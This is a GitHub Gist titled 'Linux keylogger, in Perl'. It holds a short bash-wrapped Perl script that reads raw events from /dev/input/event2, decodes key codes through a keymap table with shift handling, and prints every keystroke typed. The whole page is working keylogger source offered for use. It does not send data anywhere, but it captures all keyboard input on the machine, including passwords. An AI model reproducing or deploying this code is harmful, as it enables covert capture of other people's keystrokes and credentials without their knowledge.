Last active
June 28, 2020 19:16
-
-
Save DeeNewcum/4773435 to your computer and use it in GitHub Desktop.
Linux keylogger, in Perl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| /usr/bin/perl -nlx "$0" /dev/input/event2 | |
| #!perl | |
| # keylogger decoder | |
| # | |
| # similar programs: | |
| # http://manpages.ubuntu.com/manpages/maverick/man8/logkeys.8.html | |
| # http://en.usenet.digipedia.org/thread/16321/547/ | |
| use Data::Dumper; | |
| BEGIN { | |
| $/ = \16; | |
| ## cooked mode, echo off | |
| system "stty", '-icanon', '-echo', 'eol', "\001" if -t STDOUT; | |
| END { | |
| ## reset tty mode before exiting | |
| system 'stty', 'icanon', 'echo', 'eol', chr(0) if -t STDOUT; | |
| } | |
| ############################### | |
| ## field1: key without shift | |
| ## field2: key with shift | |
| @keycode = map { [split ' '] } split /[\n\r]+/s, <<'EOF'; | |
| ?? | |
| <esc> | |
| 1 ! | |
| 2 @ | |
| 3 # | |
| 4 $ | |
| 5 % | |
| 6 ^ | |
| 7 & | |
| 8 * | |
| 9 ( | |
| 0 ) | |
| - _ | |
| = + | |
| <backspace> | |
| <tab> | |
| q Q | |
| w W | |
| e E | |
| r R | |
| t T | |
| y Y | |
| u U | |
| i I | |
| o O | |
| p P | |
| [ { | |
| ] } | |
| <enter> | |
| <control> | |
| a A | |
| s S | |
| d D | |
| f F | |
| g G | |
| h H | |
| j J | |
| k K | |
| l L | |
| ; : | |
| ' " | |
| ??? | |
| <shift> | |
| \ ? | |
| z Z | |
| x X | |
| c C | |
| v V | |
| b B | |
| n N | |
| m M | |
| , < | |
| . > | |
| / ? | |
| <rshift> | |
| * | |
| <alt> | |
| <space> | |
| <capslock> | |
| <f1> | |
| <f2> | |
| <f3> | |
| <f4> | |
| <f5> | |
| <f6> | |
| <f7> | |
| <f8> | |
| <f9> | |
| <f10> | |
| <numlock> | |
| <scrolllock> | |
| 7 | |
| 8 | |
| 9 | |
| - | |
| 4 | |
| 5 | |
| 6 | |
| + | |
| 1 | |
| 2 | |
| 3 | |
| 0 | |
| . | |
| ?? | |
| ?? | |
| ?? | |
| <f11> | |
| <f12> | |
| ?? | |
| ?? | |
| ?? | |
| <control> | |
| ?? | |
| <sysrq> | |
| ?? | |
| <keypad_enter> | |
| <rctrl> | |
| / | |
| ?? | |
| <ralt> | |
| ?? | |
| <home> | |
| <up> | |
| <pgup> | |
| <left> | |
| <right> | |
| <end> | |
| <down> | |
| <pgdn> | |
| <ins> | |
| <del> | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| ?? | |
| <windows> | |
| EOF | |
| $keycode[57] = [' ']; | |
| $keycode[28] = ["\n"]; | |
| $keycode[96] = ["\n"]; | |
| $keycode[42] = ['']; # hide shift... these should already display properly | |
| $keycode[54] = ['']; | |
| $|++; | |
| #print Dumper \@keycode; | |
| } | |
| # struct input_event { | |
| # struct timeval time; | |
| # unsigned short type; | |
| # unsigned short code; /* subtype */ | |
| # unsigned int value; | |
| # }; | |
| my %ev; | |
| @ev{qw{ tv_sec tv_usec type code value }} = unpack "L!L!S!S!i!"; | |
| if ($ev{type} == 1) { # keystroke | |
| if ($ev{value} == 1) { # key-down | |
| $decoded = $keycode[$ev{code}]; | |
| $print_decoded = $decoded->[0]; | |
| $print_decoded = $decoded->[1] if ($modifier_shift && $decoded->[1] && $decoded->[1] ne '??'); | |
| #print "\r\e[K$print_decoded $ev{code}"; | |
| printf "$print_decoded"; | |
| } | |
| if ($ev{code} == 42 || $ev{code} == 54) { # shift | |
| $modifier_shift = $ev{value}; | |
| #print($modifier_shift ? "shift down" : "shift up"); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment